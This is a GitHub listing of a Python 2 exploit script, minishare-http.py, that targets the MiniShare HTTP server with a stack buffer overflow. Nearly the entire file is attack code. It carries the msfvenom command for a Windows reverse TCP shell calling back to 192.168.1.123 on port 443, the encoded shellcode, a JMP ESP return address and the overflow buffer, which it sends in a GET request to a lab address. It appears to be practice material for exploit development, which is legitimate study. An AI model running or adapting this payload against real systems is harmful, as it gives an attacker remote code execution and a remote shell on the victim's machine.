-
Notifications
You must be signed in to change notification settings - Fork 0
/
minishare-http.py
47 lines (38 loc) · 2.04 KB
/
minishare-http.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 774699BF FFE4 JMP ESP
# bad characters \x00\x0d
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
shellcode = ("\xdb\xd6\xd9\x74\x24\xf4\xb8\x2a\x89\xf7\x52\x5f\x33\xc9\xb1"
"\x52\x31\x47\x17\x03\x47\x17\x83\xc5\x75\x15\xa7\xe5\x6e\x58"
"\x48\x15\x6f\x3d\xc0\xf0\x5e\x7d\xb6\x71\xf0\x4d\xbc\xd7\xfd"
"\x26\x90\xc3\x76\x4a\x3d\xe4\x3f\xe1\x1b\xcb\xc0\x5a\x5f\x4a"
"\x43\xa1\x8c\xac\x7a\x6a\xc1\xad\xbb\x97\x28\xff\x14\xd3\x9f"
"\xef\x11\xa9\x23\x84\x6a\x3f\x24\x79\x3a\x3e\x05\x2c\x30\x19"
"\x85\xcf\x95\x11\x8c\xd7\xfa\x1c\x46\x6c\xc8\xeb\x59\xa4\x00"
"\x13\xf5\x89\xac\xe6\x07\xce\x0b\x19\x72\x26\x68\xa4\x85\xfd"
"\x12\x72\x03\xe5\xb5\xf1\xb3\xc1\x44\xd5\x22\x82\x4b\x92\x21"
"\xcc\x4f\x25\xe5\x67\x6b\xae\x08\xa7\xfd\xf4\x2e\x63\xa5\xaf"
"\x4f\x32\x03\x01\x6f\x24\xec\xfe\xd5\x2f\x01\xea\x67\x72\x4e"
"\xdf\x45\x8c\x8e\x77\xdd\xff\xbc\xd8\x75\x97\x8c\x91\x53\x60"
"\xf2\x8b\x24\xfe\x0d\x34\x55\xd7\xc9\x60\x05\x4f\xfb\x08\xce"
"\x8f\x04\xdd\x41\xdf\xaa\x8e\x21\x8f\x0a\x7f\xca\xc5\x84\xa0"
"\xea\xe6\x4e\xc9\x81\x1d\x19\x36\xfd\x37\xc6\xde\xfc\x47\xf9"
"\xa5\x88\xa1\x93\xc9\xdc\x7a\x0c\x73\x45\xf0\xad\x7c\x53\x7d"
"\xed\xf7\x50\x82\xa0\xff\x1d\x90\x55\xf0\x6b\xca\xf0\x0f\x46"
"\x62\x9e\x82\x0d\x72\xe9\xbe\x99\x25\xbe\x71\xd0\xa3\x52\x2b"
"\x4a\xd1\xae\xad\xb5\x51\x75\x0e\x3b\x58\xf8\x2a\x1f\x4a\xc4"
"\xb3\x1b\x3e\x98\xe5\xf5\xe8\x5e\x5c\xb4\x42\x09\x33\x1e\x02"
"\xcc\x7f\xa1\x54\xd1\x55\x57\xb8\x60\x00\x2e\xc7\x4d\xc4\xa6"
"\xb0\xb3\x74\x48\x6b\x70\x94\xab\xb9\x8d\x3d\x72\x28\x2c\x20"
"\x85\x87\x73\x5d\x06\x2d\x0c\x9a\x16\x44\x09\xe6\x90\xb5\x63"
"\x77\x75\xb9\xd0\x78\x5c")
buffer = "A" * 1787 + "\xbf\x99\x46\x77" + "\x90" * 16 + shellcode + "C" * (2800 - 1787 - 4 - 351 - 16)
try:
print "\nSending evil buffer..."
s.connect(("192.168.1.131", 80))
s.send('GET ' + buffer + 'HTTP/1.1\r\n\r\n')
print "\nDone!."
except:
print "Could not connect to HTTP!"